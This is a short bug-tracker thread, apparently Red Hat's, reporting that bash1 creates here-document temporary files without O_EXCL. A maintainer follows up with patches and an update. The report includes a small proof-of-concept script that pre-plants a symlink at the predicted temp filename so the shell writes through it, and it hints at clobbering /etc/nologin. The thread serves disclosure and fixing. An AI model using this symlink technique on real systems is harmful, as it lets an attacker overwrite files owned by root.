I've read a mail from BUGTRAQ written by Paul Szabo http://www.securityfocus.com/templates/archive.pike?list=1&mid=146657 about sh << vulnerability (the same as the tcsh vulnerability). I've tested it under redhat/i386 6.2. The bash1 contains the same bug, incorrectly create (without the O_EXCL flag) temporary files. Probably other redhat versions affected too. #!/bin/bash ls -l /tmp/nologin ln -s /tmp/nologin /tmp/t$[$$+3]-sh cat <<EOF Only root can create /etc/nologin. Do any boot-time scripts use sh? EOF ls -l /tmp/nologin cat /tmp/nologin I've checked this with bash2, it isn't vulnerable (bash2 uses the O_EXCL flag when creating tmp files).
Created attachment 5702 [details] Proposed fix
Working on it - the patch I've attached should fix the problem.
Created attachment 5703 [details] Fixed patch
Oops, forgot about the umask().
Update released.